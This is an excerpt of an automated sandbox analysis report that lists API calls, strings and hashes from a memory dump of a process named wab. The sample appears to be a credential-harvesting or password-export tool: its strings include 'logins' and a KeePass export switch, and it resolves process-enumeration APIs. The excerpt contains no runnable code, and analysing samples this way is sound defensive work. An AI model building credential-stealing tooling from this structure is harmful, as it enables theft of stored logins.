                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfmemset$wcscpy$wcscat
                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                    • API String ID: 1607361635-601624466
                    • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                    • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintf$memset$wcscpy
                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                    • API String ID: 2000436516-3842416460
                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                    APIs
                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                    • String ID:
                    • API String ID: 1043902810-0
                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@_snwprintfwcscpy
                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                    • API String ID: 2899246560-1542517562
                    • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                    • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                    APIs
                    • memset.MSVCRT ref: 0040DBCD
                    • memset.MSVCRT ref: 0040DBE9
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                    • wcscpy.MSVCRT ref: 0040DC2D
                    • wcscpy.MSVCRT ref: 0040DC3C
                    • wcscpy.MSVCRT ref: 0040DC4C
                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                    • wcscpy.MSVCRT ref: 0040DCC3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                    • API String ID: 3330709923-517860148
                    • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                    • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                    APIs
                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                    • memset.MSVCRT ref: 0040806A
                    • memset.MSVCRT ref: 0040807F
                    • _wtoi.MSVCRT ref: 004081AF
                    • _wcsicmp.MSVCRT ref: 004081C3
                    • memset.MSVCRT ref: 004081E4
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                    • String ID: logins$null
                    • API String ID: 3492182834-2163367763
                    • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                    • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                    APIs
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    • memset.MSVCRT ref: 004085CF
                    • memset.MSVCRT ref: 004085F1
                    • memset.MSVCRT ref: 00408606
                    • strcmp.MSVCRT ref: 00408645
                    • _mbscpy.MSVCRT ref: 004086DB
                    • _mbscpy.MSVCRT ref: 004086FA
                    • memset.MSVCRT ref: 0040870E
                    • strcmp.MSVCRT ref: 0040876B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                    • String ID: ---
                    • API String ID: 3437578500-2854292027
                    • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                    • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                    APIs
                    • memset.MSVCRT ref: 0041087D
                    • memset.MSVCRT ref: 00410892
                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                    • GetSysColor.USER32(0000000F), ref: 00410999
                    • DeleteObject.GDI32(?), ref: 004109D0
                    • DeleteObject.GDI32(?), ref: 004109D6
                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                    • String ID:
                    • API String ID: 1010922700-0
                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                    APIs
                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                    • malloc.MSVCRT ref: 004186B7
                    • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                    • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                    • malloc.MSVCRT ref: 004186FE
                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$FullNamePath$malloc$Version
                    • String ID: |A
                    • API String ID: 4233704886-1717621600
                    • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                    • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp
                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                    • API String ID: 2081463915-1959339147
                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                    • API String ID: 2012295524-70141382
                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                    • API String ID: 667068680-3953557276
                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                    APIs
                    • GetDC.USER32(00000000), ref: 004121FF
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                    • SelectObject.GDI32(?,?), ref: 00412251
                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                    • SetCursor.USER32(00000000), ref: 004122BC
                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                    • memcpy.MSVCRT ref: 0041234D
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                    • String ID:
                    • API String ID: 1700100422-0
                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                    APIs
                    • GetClientRect.USER32(?,?), ref: 004111E0
                    • GetWindowRect.USER32(?,?), ref: 004111F6
                    • GetWindowRect.USER32(?,?), ref: 0041120C
                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                    • GetWindowRect.USER32(00000000), ref: 0041124D
                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                    • String ID:
                    • API String ID: 552707033-0
                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                    APIs
                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                      • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                    • memcpy.MSVCRT ref: 0040C11B
                    • strchr.MSVCRT ref: 0040C140
                    • strchr.MSVCRT ref: 0040C151
                    • _strlwr.MSVCRT ref: 0040C15F
                    • memset.MSVCRT ref: 0040C17A
                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                    • String ID: 4$h
                    • API String ID: 4066021378-1856150674
                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf
                    • String ID: %%0.%df
                    • API String ID: 3473751417-763548558
                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                    APIs
                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                    • KillTimer.USER32(?,00000041), ref: 004060D7
                    • KillTimer.USER32(?,00000041), ref: 004060E8
                    • GetTickCount.KERNEL32 ref: 0040610B
                    • GetParent.USER32(?), ref: 00406136
                    • SendMessageW.USER32(00000000), ref: 0040613D
                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                    • String ID: A
                    • API String ID: 2892645895-3554254475
                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                    APIs
                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                    • GetDesktopWindow.USER32 ref: 0040D9FD
